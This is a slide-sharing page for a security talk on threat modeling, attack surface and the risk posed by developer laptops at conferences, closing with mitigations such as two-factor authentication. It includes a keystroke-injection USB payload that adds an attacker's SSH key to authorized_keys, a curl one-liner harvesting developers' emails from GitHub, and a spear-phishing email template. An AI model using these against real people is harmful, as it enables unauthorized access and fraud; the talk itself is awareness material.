Gareth Rushgrove, profile picture
Uploaded byGareth Rushgrove
1,128 views

Thinking Evil Thoughts

This document discusses threat modeling and how to properly scope security assessments. It provides examples of how threat modeling can be applied, including getting the full scope of the system correct and identifying risks. The document warns that developer laptops and conferences pose security risks and outlines some mitigation approaches like two-factor authentication and separation of duties. The overall message is that modern development approaches require keeping security top of mind.

Embed presentation

Downloaded 10 times
(without introducing more risk) Thinking Evil Thoughts Puppet Gareth Rushgrove A taste of threat modeling
(without introducing more risk) @garethr
(without introducing more risk) Gareth Rushgrove
(without introducing more risk) This Talk What to expect
- What is threat modeling? - Getting the scope right - Identifying risks - Using conferences to hack people Gareth Rushgrove
Introduce some security language to help you navigate the domain Gareth Rushgrove
Dive straight into examples Gareth Rushgrove
Empower you to ask questions more than provide easy answers Gareth Rushgrove
(without introducing more risk) Threat modeling A brief introduction
Gareth Rushgrove a procedure for optimizing network security by identifying objectives and vulnerabilities THREAT MODELING
- Determine scope - Identify threat agents and attacks - Understand existing countermeasures - Identify vulnerabilities - Prioritise risks - Identify countermeasures Gareth Rushgrove https://www.owasp.org/index.php/Category:Threat_Modeling
Inside each of us, there is the seed of both good and evil. It's a constant struggle as to which one will win. Gareth Rushgrove “ ”Eric Burdon
(without introducing more risk) Think evil.
(without introducing more risk) Getting the scope rights Avoiding gaps in your threat model
Ignoring part of your system when considering security is a common mistake Gareth Rushgrove
Gareth Rushgrove the attack surface of a software environment is the sum of the different points (the "attack vectors") where an unauthorized user (the "attacker") can try to enter data to or extract data from an environment. ATTACK SURFACE
(without introducing more risk) Example What is Production? Gareth Rushgrove
LOAD BALANCER FRONT END BACK END DATABASE PRODUCTION?
LOAD BALANCER FRONT END BACK END DATABASE PRODUCTION? PEOPLE DESKTOPS CI SERVER
LOAD BALANCER FRONT END BACK END DATABASE PRODUCTION? PEOPLE DESKTOPS CI SERVER HYPERVISOR MANAGEMENT MONITORING
Do you protect your CI stack as well as your production database? Gareth Rushgrove
Could I execute a query on your production database if I compromised your CI server? Gareth Rushgrove
Example Third party services Gareth Rushgrove
Gareth Rushgrove an entity which facilitates interactions between two parties who both trust the third party TRUSTED THIRD PARTY
Gareth Rushgrove a term in computer science and security used to describe a boundary where program data or execution changes its level of "trust". The term refers to any distinct boundary within which a system trusts all sub-systems (including data). TRUST BOUNDARY
Gareth Rushgrove
Why Serverless is a bad name Gareth Rushgrove
(without introducing more risk) There are still servers somewhere Gareth Rushgrove
How you think about the servers changes, and the respective risks and mitigations change. But servers still exist. Gareth Rushgrove
Why NoOps is a bad name Gareth Rushgrove
How you think about operations changes, and the respective risks and mitigations change. But operations still exist. Gareth Rushgrove
Your attack surface is bigger than you think Gareth Rushgrove
(without introducing more risk) Identifying risks The need to understand your system
Differences in how you perceive a system and how it actually works can be used to exploit it Gareth Rushgrove
Example Immutable infrastructure Gareth Rushgrove
Out systems are immutable, we don’t need runtime file integrity checking Gareth Rushgrove “ ”A possibly naive developer
Gareth Rushgrove unchanging over time or unable to be changed. synonyms: unchangeable, fixed IMMUTABLE
(without introducing more risk) Containers are not immutable by default Gareth Rushgrove
(without introducing more risk) Containers are not immutable by default Gareth Rushgrove
(without introducing more risk) Gareth Rushgrove $ docker run -d alpine /bin/sh -c "while true; do echo hello world; sleep 1; done"
(without introducing more risk) Gareth Rushgrove $ docker exec a7a01beb14de touch /tmp/surprise
(without introducing more risk) Gareth Rushgrove $ docker diff a7a01beb14de C /tmp A /tmp/surprise
(without introducing more risk) Gareth Rushgrove $ docker run --read-only -d alpine /bin/sh -c "while true; do echo hello world; sleep 1; done"
(without introducing more risk) Gareth Rushgrove $ docker exec 379150b2cf05 touch /tmp/surprise touch: cannot touch '/tmp/surprise': Read-only file syste
(without introducing more risk) Do your immutable EC2 instances have read-only filesystems? Gareth Rushgrove
(without introducing more risk) Most Immutable Infrastructure isn’t Gareth Rushgrove
(without introducing more risk) Without technical controls you only have social guarantees of immutability Gareth Rushgrove
(without introducing more risk) Hacking conferences Looking for vulnerabilities
Let’s assume your applications and infrastructure are super secure* Gareth Rushgrove * This probably isn’t true. You should worry about that as well.
- Penetration testing - Intrusion detection system - Web application firewall - Network firewalls - Malware scanning - Configuration management Gareth Rushgrove
Gareth Rushgrove How secure is your laptop?
- Hand maintained configuration - Updated whenever - No central monitoring - Administrative access - Single factor authentication Gareth Rushgrove
Can you push new Docker images from your laptop? Gareth Rushgrove
Can you create jobs on your Jenkins instance from your laptop? Gareth Rushgrove
Can you launch new replication controllers from your laptop? Gareth Rushgrove
Can you release new functions to Lambda from your laptop? Gareth Rushgrove
Real world threat
(without introducing more risk) As a hacker how do I own your laptop? The fun stuff
Where can I find hundreds of developer laptops… Gareth Rushgrove
Developer Conferences are a Target Rich Environment Gareth Rushgrove
Gareth Rushgrove More Internet Some Internet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK
Gareth Rushgrove More Internet Some Internet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK This is the official conference wifi right?
Gareth Rushgrove More Internet Some Internet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK Or is it this one? Whatever, both work
Devices exist to man-in-the-middle wireless networks Gareth Rushgrove
Who has ever picked up a USB memory stick at a conference? Gareth Rushgrove
Gareth Rushgrove
USB devices exist which will run a script on connect (normally by impersonating a keyboard) Gareth Rushgrove
(without introducing more risk) DELAY 1000 COMMAND SPACE DELAY 500 STRING Terminal DELAY 500 ENTER DELAY 800 STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys ENTER DELAY 1000 STRING killall Terminal ENTER Add my public key https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Passwordless-SSH-access-%28ssh-keys%29
Local databases
Lots of people here are on Twitter and using the conference hashtag Gareth Rushgrove
Lots of people here are on GitHub with the same username Gareth Rushgrove
(without introducing more risk) $ curl -s https://api.github.com/users/<username>/events/public | jq '.[].payload.commits[0].author.email' | sort | uniq | grep -v "null" Email from GitHub user
an e-mail spoofing fraud attempt that targets a specific organization or individual, seeking unauthorized access to confidential data. Gareth Rushgrove SPEAR PHISHING
Hi <your name> Great to see you at <conference name here> last week. I thought you’d be interested in the container testing tool I mentioned. http://nothingevilhere.com. Would love to know what you think. Hopefully see you at DockerCon next year too.
(without introducing more risk) So you’re saying we’re all doomed? This is quite depressing now I think about it
Part of threat modeling is coming up with suitable mitigations to the risks identified Gareth Rushgrove
- 2 factor authentication - Time-limited credentials - Separation of duties - Two person rule - Configuration management Gareth Rushgrove
having more than one person required to complete a task. In business the separation by sharing of more than one individual in one single task is an internal control intended to prevent fraud and error. Gareth Rushgrove SEPARATION OF DUTIES
a control mechanism designed to achieve a high level of security for especially critical material or operations. Under this rule all access and actions requires the presence of two authorized people at all times. Gareth Rushgrove TWO-PERSON RULE
Gareth Rushgrove a process that identifies critical information to determine if friendly actions can be observed by enemy intelligence and determines if information obtained by adversaries could be interpreted to be useful to them. OPERATIONAL SECURITY (OPSEC)
Once you understand the threat you can seek out specific guidance Gareth Rushgrove
- Protect data in transit - Protect data at rest - Authentication - Secure boot - Platform integrity and sandboxing - Application whitelisting Gareth Rushgrove - Malicious code detection - Security policy enforcement - External interface protection - Device update policy - Event collection and analysis - Incident response https://www.cesg.gov.uk/guidance/end-user-devices-security-principles
Education. Education. Education. Gareth Rushgrove
Gareth Rushgrove
(without introducing more risk) Conclusions If all you remember is…
With Cloud Native approaches developers are nearer to production than ever before Gareth Rushgrove
The efficiency of modern tooling introduces new threats, and magnifies existing ones Gareth Rushgrove
Existing mitigations and security controls won’t be enough. You need to collaborate with security colleagues on new approaches Gareth Rushgrove
Threat modeling should be part of your development process Gareth Rushgrove
Gareth Rushgrove
Elevation of privilege
Gareth Rushgrove
(without introducing more risk) Thanks And any questions?

More Related Content

PDF
Communications Between Tribes
byGareth Rushgrove
 
PDF
Two Sides of Google Infrastructure for Everyone Else
byGareth Rushgrove
 
PDF
DOES16 London - Gareth Rushgrove - Communication Between Tribes: A Story of S...
byGene Kim
 
PDF
Empire Work shop
byHaydn Johnson
 
PDF
Bsides to 2016-penetration-testing
byHaydn Johnson
 
PDF
The Challenges of Container Configuration
byGareth Rushgrove
 
PDF
Puppet and Openshift
byGareth Rushgrove
 
PDF
OlinData Puppet Presentation for MOSC 2012
byWalter Heck
 
Communications Between Tribes
byGareth Rushgrove
 
Two Sides of Google Infrastructure for Everyone Else
byGareth Rushgrove
 
DOES16 London - Gareth Rushgrove - Communication Between Tribes: A Story of S...
byGene Kim
 
Empire Work shop
byHaydn Johnson
 
Bsides to 2016-penetration-testing
byHaydn Johnson
 
The Challenges of Container Configuration
byGareth Rushgrove
 
Puppet and Openshift
byGareth Rushgrove
 
OlinData Puppet Presentation for MOSC 2012
byWalter Heck
 

Viewers also liked

PDF
Puppet User Group Presentation - 15 March 2012
byWalter Heck
 
PPTX
Introduction to Puppet Enterprise 2016.5
byPuppet
 
PDF
PuppetConf 2016: Puppet as Security Tooling – Bill Weiss, Puppet
byPuppet
 
PPTX
Introduction to Puppet Enterprise 2016.5
byPuppet
 
PPTX
Network Automation at Shapeways
byPuppet
 
PPTX
Demystifying TLS
byPuppet
 
PPTX
Introduction to Puppet Enterprise
byPuppet
 
PPTX
Introduction to Puppet Enterprise 2016.5
byPuppet
 
PPTX
Introduction to Puppet Enterprise
byPuppet
 
PPTX
Introduction to Puppet Enterprise
byPuppet
 
PPTX
Adopting Kubernetes with Puppet
byPuppet
 
PDF
What to Build with Google App Engine
byGareth Rushgrove
 
PDF
Puppet Data Mining
byGareth Rushgrove
 
PDF
Developing IoT devices. Creating wearables with the new LinkIt™ 2523 HDK by SAC
byMediaTek Labs
 
PDF
OlinData Puppet Presentation for DevOps Singapore meet-up
byWalter Heck
 
PDF
PuppetConf. 2016: Puppet Best Practices: Roles & Profiles – Gary Larizza, Puppet
byPuppet
 
PDF
Getting Started With Puppet - Chad Metcalf
byPuppet
 
PPTX
What's New in Puppet Enterprise 2016.4
byPuppet
 
PDF
Advice on how to get started — and ahead — in a career in DevOps
byPuppet
 
PDF
PuppetConf 2016: Device-Based Modules: Making Them as Simple as a Light Switc...
byPuppet
 
Puppet User Group Presentation - 15 March 2012
byWalter Heck
 
Introduction to Puppet Enterprise 2016.5
byPuppet
 
PuppetConf 2016: Puppet as Security Tooling – Bill Weiss, Puppet
byPuppet
 
Introduction to Puppet Enterprise 2016.5
byPuppet
 
Network Automation at Shapeways
byPuppet
 
Demystifying TLS
byPuppet
 
Introduction to Puppet Enterprise
byPuppet
 
Introduction to Puppet Enterprise 2016.5
byPuppet
 
Introduction to Puppet Enterprise
byPuppet
 
Introduction to Puppet Enterprise
byPuppet
 
Adopting Kubernetes with Puppet
byPuppet
 
What to Build with Google App Engine
byGareth Rushgrove
 
Puppet Data Mining
byGareth Rushgrove
 
Developing IoT devices. Creating wearables with the new LinkIt™ 2523 HDK by SAC
byMediaTek Labs
 
OlinData Puppet Presentation for DevOps Singapore meet-up
byWalter Heck
 
PuppetConf. 2016: Puppet Best Practices: Roles & Profiles – Gary Larizza, Puppet
byPuppet
 
Getting Started With Puppet - Chad Metcalf
byPuppet
 
What's New in Puppet Enterprise 2016.4
byPuppet
 
Advice on how to get started — and ahead — in a career in DevOps
byPuppet
 
PuppetConf 2016: Device-Based Modules: Making Them as Simple as a Light Switc...
byPuppet
 

Similar to Thinking Evil Thoughts

PDF
Introduction to Cybersecurity and a remote guide
byadultme43
 
PDF
DSS ITSEC CONFERENCE - Lumension Security - Intelligent application whiteli...
byAndris Soroka
 
PPTX
[DSBW Spring 2009] Unit 08: WebApp Security
byCarles Farré
 
PDF
CompTIA-Security-Study-Guide-with-over-500-Practice-Test-Questions-Exam-SY0-7...
byemestica1
 
PPTX
A general security rule is that if an individual can physically touch a devic...
byChandravathi Dittakavi
 
PDF
Unit 08: Security for Web Applications
byDSBW 2011/2002 - Carles Farré - Barcelona Tech
 
ODP
Cyber Security for Financial Institutions
byKhawar Nehal khawar.nehal@atrc.net.pk
 
PPTX
Altitude SF 2017: Security at the edge
byFastly
 
PPTX
CyberSecurity Threats in the Digital Age(1).pptx
byzainchaudary496
 
PDF
Information Security Risk Management
byipspat
 
PPT
College Presentation
byscottfrost
 
PPTX
Move Fast and Fix Things
byDan Kaminsky
 
PPTX
Disruptionware-TRustedCISO103020v0.7.pptx
byDebra Baker, CISSP CSSP
 
PDF
For Public_ Cybersecurity_ Frameworks, Fundamentals, and Foundations 2023.pdf
byJustinBrown267905
 
PPT
A holistic view_of_enterprise_security
byehawk01
 
DOCX
FIDO AUTHENTICATIONDEFINITION· Acronym FIDO stands for Fast I
byChereCheek752
 
PDF
Presentation- Introduction to Cybersecurity.pdf
byfizarcse
 
PPTX
Threats that Matter - Murray State University 2017
bychrissanders88
 
PPTX
attack vectors by chimwemwe.pptx
byJenetSilence
 
PPT
Application Security
byReggie Niccolo Santos
 
Introduction to Cybersecurity and a remote guide
byadultme43
 
DSS ITSEC CONFERENCE - Lumension Security - Intelligent application whiteli...
byAndris Soroka
 
[DSBW Spring 2009] Unit 08: WebApp Security
byCarles Farré
 
CompTIA-Security-Study-Guide-with-over-500-Practice-Test-Questions-Exam-SY0-7...
byemestica1
 
A general security rule is that if an individual can physically touch a devic...
byChandravathi Dittakavi
 
Unit 08: Security for Web Applications
byDSBW 2011/2002 - Carles Farré - Barcelona Tech
 
Cyber Security for Financial Institutions
byKhawar Nehal khawar.nehal@atrc.net.pk
 
Altitude SF 2017: Security at the edge
byFastly
 
CyberSecurity Threats in the Digital Age(1).pptx
byzainchaudary496
 
Information Security Risk Management
byipspat
 
College Presentation
byscottfrost
 
Move Fast and Fix Things
byDan Kaminsky
 
Disruptionware-TRustedCISO103020v0.7.pptx
byDebra Baker, CISSP CSSP
 
For Public_ Cybersecurity_ Frameworks, Fundamentals, and Foundations 2023.pdf
byJustinBrown267905
 
A holistic view_of_enterprise_security
byehawk01
 
FIDO AUTHENTICATIONDEFINITION· Acronym FIDO stands for Fast I
byChereCheek752
 
Presentation- Introduction to Cybersecurity.pdf
byfizarcse
 
Threats that Matter - Murray State University 2017
bychrissanders88
 
attack vectors by chimwemwe.pptx
byJenetSilence
 
Application Security
byReggie Niccolo Santos
 

More from Gareth Rushgrove

PDF
Web operations
byGareth Rushgrove
 
PDF
Learnings from govuk
byGareth Rushgrove
 
PDF
Config managament for development environments ii
byGareth Rushgrove
 
PDF
Varnish Caching
byGareth Rushgrove
 
PDF
Vagrant and Configuration Management
byGareth Rushgrove
 
PDF
Metrics with Ganglia
byGareth Rushgrove
 
PDF
You're Going To Need A Bigger Toolbox
byGareth Rushgrove
 
PDF
Devops
byGareth Rushgrove
 
PDF
Automating web site deployment
byGareth Rushgrove
 
PDF
Message Queues for Web Applications
byGareth Rushgrove
 
PDF
Beyond basic web development
byGareth Rushgrove
 
PDF
Self Education for Web Professionals
byGareth Rushgrove
 
PDF
App Engine for Python Developers
byGareth Rushgrove
 
PDF
Testing Django Applications
byGareth Rushgrove
 
PDF
Design Strategies for a Distributed Web
byGareth Rushgrove
 
PDF
A First Class Web Citizen
byGareth Rushgrove
 
PDF
Parsing Microformats
byGareth Rushgrove
 
PDF
Things you probably don't do (or tying to make project automation sexy)
byGareth Rushgrove
 
PDF
Notes from (Web 2.0) Revolution
byGareth Rushgrove
 
PDF
Rails flavoured OpenId
byGareth Rushgrove
 
Web operations
byGareth Rushgrove
 
Learnings from govuk
byGareth Rushgrove
 
Config managament for development environments ii
byGareth Rushgrove
 
Varnish Caching
byGareth Rushgrove
 
Vagrant and Configuration Management
byGareth Rushgrove
 
Metrics with Ganglia
byGareth Rushgrove
 
You're Going To Need A Bigger Toolbox
byGareth Rushgrove
 
Devops
byGareth Rushgrove
 
Automating web site deployment
byGareth Rushgrove
 
Message Queues for Web Applications
byGareth Rushgrove
 
Beyond basic web development
byGareth Rushgrove
 
Self Education for Web Professionals
byGareth Rushgrove
 
App Engine for Python Developers
byGareth Rushgrove
 
Testing Django Applications
byGareth Rushgrove
 
Design Strategies for a Distributed Web
byGareth Rushgrove
 
A First Class Web Citizen
byGareth Rushgrove
 
Parsing Microformats
byGareth Rushgrove
 
Things you probably don't do (or tying to make project automation sexy)
byGareth Rushgrove
 
Notes from (Web 2.0) Revolution
byGareth Rushgrove
 
Rails flavoured OpenId
byGareth Rushgrove
 

Recently uploaded

PDF
final.pdf
byomarbishtawi04
 
PDF
Explaining specific examples of purpose-specific BOM
byakipii ogaoga
 
PPTX
PPTX game guess the logo with a twistppt
byAdrianAnig
 
PDF
HOW TO OVERCOME THE THREATS OF ARTIFICIAL INTELLIGENCE AGAINST HUMANITY.pdf
byFaga1939
 
PDF
Oracle Cloud Infrastructure 2025 Architect Professional (1Z0-1127-25) Master ...
byExamCert App
 
PDF
apidays New York 2025 | AI in Application Security
byapidays
 
PDF
shayk.online - Anonymous chat with Sinatra and WebSockets
byEleanor McHugh
 
PPTX
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
PPTX
The Transformative Technology in Contemporary Businesses
bygreyaudrina
 
PPTX
Do You Control the AI, or Does the AI Control You?
bymedhateltoukhy
 
PPTX
CTO Strategy OS 2026: The Tech, AI & Cloud Playbook Boards Want
byridwansassman
 
PDF
UiPath Modern Automation Playbook -Session 2
bysuhanisingh58689
 
PDF
February 2026 Patch Tuesday hosted by Chris Goettl and Todd Schell
byIvanti
 
PDF
TrustArc Webinar - From Trends to Action: Fitting AI Governance into Privacy Ops
byTrustArc
 
PDF
Empower your IT team with cloud-based PC management using Dell Management Por...
byPrincipled Technologies
 
PDF
Constraint Collapse and Fidelity Decay in Scaled Language Models
bySemantic Fidelity Lab | A. Jacobs
 
PDF
GDG Cloud Southlake #49: Pradeep R Kumar: Implications of Agentic AI for Iden...
byJames Anderson
 
PDF
Chapter 5 Security Mechanisms iin computer security.pdf
byGetnet Tigabie Askale -(GM)
 
PPTX
Tech Trends 2026: AI Agents, Quantum Computing, Robotics & Cybersecurity
byridwansassman
 
PPTX
Microsoft Azure News - February 2026 - BAUG
byDaniel Toomey
 
final.pdf
byomarbishtawi04
 
Explaining specific examples of purpose-specific BOM
byakipii ogaoga
 
PPTX game guess the logo with a twistppt
byAdrianAnig
 
HOW TO OVERCOME THE THREATS OF ARTIFICIAL INTELLIGENCE AGAINST HUMANITY.pdf
byFaga1939
 
Oracle Cloud Infrastructure 2025 Architect Professional (1Z0-1127-25) Master ...
byExamCert App
 
apidays New York 2025 | AI in Application Security
byapidays
 
shayk.online - Anonymous chat with Sinatra and WebSockets
byEleanor McHugh
 
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
The Transformative Technology in Contemporary Businesses
bygreyaudrina
 
Do You Control the AI, or Does the AI Control You?
bymedhateltoukhy
 
CTO Strategy OS 2026: The Tech, AI & Cloud Playbook Boards Want
byridwansassman
 
UiPath Modern Automation Playbook -Session 2
bysuhanisingh58689
 
February 2026 Patch Tuesday hosted by Chris Goettl and Todd Schell
byIvanti
 
TrustArc Webinar - From Trends to Action: Fitting AI Governance into Privacy Ops
byTrustArc
 
Empower your IT team with cloud-based PC management using Dell Management Por...
byPrincipled Technologies
 
Constraint Collapse and Fidelity Decay in Scaled Language Models
bySemantic Fidelity Lab | A. Jacobs
 
GDG Cloud Southlake #49: Pradeep R Kumar: Implications of Agentic AI for Iden...
byJames Anderson
 
Chapter 5 Security Mechanisms iin computer security.pdf
byGetnet Tigabie Askale -(GM)
 
Tech Trends 2026: AI Agents, Quantum Computing, Robotics & Cybersecurity
byridwansassman
 
Microsoft Azure News - February 2026 - BAUG
byDaniel Toomey
 

Thinking Evil Thoughts

  • 1.
    (without introducing morerisk) Thinking Evil Thoughts Puppet Gareth Rushgrove A taste of threat modeling
  • 2.
  • 3.
    (without introducing morerisk) Gareth Rushgrove
  • 4.
    (without introducing morerisk) This Talk What to expect
  • 5.
    - What isthreat modeling? - Getting the scope right - Identifying risks - Using conferences to hack people Gareth Rushgrove
  • 6.
    Introduce some securitylanguage to help you navigate the domain Gareth Rushgrove
  • 7.
    Dive straight intoexamples Gareth Rushgrove
  • 8.
    Empower you toask questions more than provide easy answers Gareth Rushgrove
  • 9.
    (without introducing morerisk) Threat modeling A brief introduction
  • 10.
    Gareth Rushgrove a procedurefor optimizing network security by identifying objectives and vulnerabilities THREAT MODELING
  • 11.
    - Determine scope -Identify threat agents and attacks - Understand existing countermeasures - Identify vulnerabilities - Prioritise risks - Identify countermeasures Gareth Rushgrove https://www.owasp.org/index.php/Category:Threat_Modeling
  • 12.
    Inside each ofus, there is the seed of both good and evil. It's a constant struggle as to which one will win. Gareth Rushgrove “ ”Eric Burdon
  • 13.
    (without introducing morerisk) Think evil.
  • 14.
    (without introducing morerisk) Getting the scope rights Avoiding gaps in your threat model
  • 15.
    Ignoring part ofyour system when considering security is a common mistake Gareth Rushgrove
  • 16.
    Gareth Rushgrove the attacksurface of a software environment is the sum of the different points (the "attack vectors") where an unauthorized user (the "attacker") can try to enter data to or extract data from an environment. ATTACK SURFACE
  • 17.
    (without introducing morerisk) Example What is Production? Gareth Rushgrove
  • 18.
    LOAD BALANCER FRONT END BACKEND DATABASE PRODUCTION?
  • 19.
    LOAD BALANCER FRONT END BACKEND DATABASE PRODUCTION? PEOPLE DESKTOPS CI SERVER
  • 20.
    LOAD BALANCER FRONT END BACKEND DATABASE PRODUCTION? PEOPLE DESKTOPS CI SERVER HYPERVISOR MANAGEMENT MONITORING
  • 21.
    Do you protectyour CI stack as well as your production database? Gareth Rushgrove
  • 22.
    Could I executea query on your production database if I compromised your CI server? Gareth Rushgrove
  • 23.
  • 24.
    Gareth Rushgrove an entitywhich facilitates interactions between two parties who both trust the third party TRUSTED THIRD PARTY
  • 25.
    Gareth Rushgrove a termin computer science and security used to describe a boundary where program data or execution changes its level of "trust". The term refers to any distinct boundary within which a system trusts all sub-systems (including data). TRUST BOUNDARY
  • 26.
  • 27.
    Why Serverless isa bad name Gareth Rushgrove
  • 28.
    (without introducing morerisk) There are still servers somewhere Gareth Rushgrove
  • 29.
    How you thinkabout the servers changes, and the respective risks and mitigations change. But servers still exist. Gareth Rushgrove
  • 30.
    Why NoOps isa bad name Gareth Rushgrove
  • 33.
    How you thinkabout operations changes, and the respective risks and mitigations change. But operations still exist. Gareth Rushgrove
  • 34.
    Your attack surfaceis bigger than you think Gareth Rushgrove
  • 35.
    (without introducing morerisk) Identifying risks The need to understand your system
  • 36.
    Differences in howyou perceive a system and how it actually works can be used to exploit it Gareth Rushgrove
  • 37.
  • 38.
    Out systems areimmutable, we don’t need runtime file integrity checking Gareth Rushgrove “ ”A possibly naive developer
  • 39.
    Gareth Rushgrove unchanging overtime or unable to be changed. synonyms: unchangeable, fixed IMMUTABLE
  • 40.
    (without introducing morerisk) Containers are not immutable by default Gareth Rushgrove
  • 41.
    (without introducing morerisk) Containers are not immutable by default Gareth Rushgrove
  • 42.
    (without introducing morerisk) Gareth Rushgrove $ docker run -d alpine /bin/sh -c "while true; do echo hello world; sleep 1; done"
  • 43.
    (without introducing morerisk) Gareth Rushgrove $ docker exec a7a01beb14de touch /tmp/surprise
  • 44.
    (without introducing morerisk) Gareth Rushgrove $ docker diff a7a01beb14de C /tmp A /tmp/surprise
  • 45.
    (without introducing morerisk) Gareth Rushgrove $ docker run --read-only -d alpine /bin/sh -c "while true; do echo hello world; sleep 1; done"
  • 46.
    (without introducing morerisk) Gareth Rushgrove $ docker exec 379150b2cf05 touch /tmp/surprise touch: cannot touch '/tmp/surprise': Read-only file syste
  • 47.
    (without introducing morerisk) Do your immutable EC2 instances have read-only filesystems? Gareth Rushgrove
  • 48.
    (without introducing morerisk) Most Immutable Infrastructure isn’t Gareth Rushgrove
  • 49.
    (without introducing morerisk) Without technical controls you only have social guarantees of immutability Gareth Rushgrove
  • 50.
    (without introducing morerisk) Hacking conferences Looking for vulnerabilities
  • 51.
    Let’s assume yourapplications and infrastructure are super secure* Gareth Rushgrove * This probably isn’t true. You should worry about that as well.
  • 52.
    - Penetration testing -Intrusion detection system - Web application firewall - Network firewalls - Malware scanning - Configuration management Gareth Rushgrove
  • 53.
  • 54.
    - Hand maintainedconfiguration - Updated whenever - No central monitoring - Administrative access - Single factor authentication Gareth Rushgrove
  • 55.
    Can you pushnew Docker images from your laptop? Gareth Rushgrove
  • 56.
    Can you createjobs on your Jenkins instance from your laptop? Gareth Rushgrove
  • 57.
    Can you launchnew replication controllers from your laptop? Gareth Rushgrove
  • 58.
    Can you releasenew functions to Lambda from your laptop? Gareth Rushgrove
  • 59.
  • 60.
    (without introducing morerisk) As a hacker how do I own your laptop? The fun stuff
  • 61.
    Where can Ifind hundreds of developer laptops… Gareth Rushgrove
  • 62.
    Developer Conferences area Target Rich Environment Gareth Rushgrove
  • 63.
    Gareth Rushgrove More Internet SomeInternet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK
  • 64.
    Gareth Rushgrove More Internet SomeInternet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK This is the official conference wifi right?
  • 65.
    Gareth Rushgrove More Internet SomeInternet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK Or is it this one? Whatever, both work
  • 66.
    Devices exist toman-in-the-middle wireless networks Gareth Rushgrove
  • 67.
    Who has everpicked up a USB memory stick at a conference? Gareth Rushgrove
  • 68.
  • 69.
    USB devices existwhich will run a script on connect (normally by impersonating a keyboard) Gareth Rushgrove
  • 70.
    (without introducing morerisk) DELAY 1000 COMMAND SPACE DELAY 500 STRING Terminal DELAY 500 ENTER DELAY 800 STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys ENTER DELAY 1000 STRING killall Terminal ENTER Add my public key https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Passwordless-SSH-access-%28ssh-keys%29
  • 71.
  • 72.
    Lots of peoplehere are on Twitter and using the conference hashtag Gareth Rushgrove
  • 73.
    Lots of peoplehere are on GitHub with the same username Gareth Rushgrove
  • 74.
    (without introducing morerisk) $ curl -s https://api.github.com/users/<username>/events/public | jq '.[].payload.commits[0].author.email' | sort | uniq | grep -v "null" Email from GitHub user
  • 75.
    an e-mail spoofingfraud attempt that targets a specific organization or individual, seeking unauthorized access to confidential data. Gareth Rushgrove SPEAR PHISHING
  • 76.
    Hi <your name> Greatto see you at <conference name here> last week. I thought you’d be interested in the container testing tool I mentioned. http://nothingevilhere.com. Would love to know what you think. Hopefully see you at DockerCon next year too.
  • 77.
    (without introducing morerisk) So you’re saying we’re all doomed? This is quite depressing now I think about it
  • 78.
    Part of threatmodeling is coming up with suitable mitigations to the risks identified Gareth Rushgrove
  • 79.
    - 2 factorauthentication - Time-limited credentials - Separation of duties - Two person rule - Configuration management Gareth Rushgrove
  • 80.
    having more thanone person required to complete a task. In business the separation by sharing of more than one individual in one single task is an internal control intended to prevent fraud and error. Gareth Rushgrove SEPARATION OF DUTIES
  • 81.
    a control mechanismdesigned to achieve a high level of security for especially critical material or operations. Under this rule all access and actions requires the presence of two authorized people at all times. Gareth Rushgrove TWO-PERSON RULE
  • 82.
    Gareth Rushgrove a processthat identifies critical information to determine if friendly actions can be observed by enemy intelligence and determines if information obtained by adversaries could be interpreted to be useful to them. OPERATIONAL SECURITY (OPSEC)
  • 83.
    Once you understandthe threat you can seek out specific guidance Gareth Rushgrove
  • 85.
    - Protect datain transit - Protect data at rest - Authentication - Secure boot - Platform integrity and sandboxing - Application whitelisting Gareth Rushgrove - Malicious code detection - Security policy enforcement - External interface protection - Device update policy - Event collection and analysis - Incident response https://www.cesg.gov.uk/guidance/end-user-devices-security-principles
  • 86.
  • 87.
  • 88.
    (without introducing morerisk) Conclusions If all you remember is…
  • 89.
    With Cloud Nativeapproaches developers are nearer to production than ever before Gareth Rushgrove
  • 90.
    The efficiency ofmodern tooling introduces new threats, and magnifies existing ones Gareth Rushgrove
  • 91.
    Existing mitigations andsecurity controls won’t be enough. You need to collaborate with security colleagues on new approaches Gareth Rushgrove
  • 92.
    Threat modeling shouldbe part of your development process Gareth Rushgrove
  • 93.
  • 94.
  • 95.
  • 96.
    (without introducing morerisk) Thanks And any questions?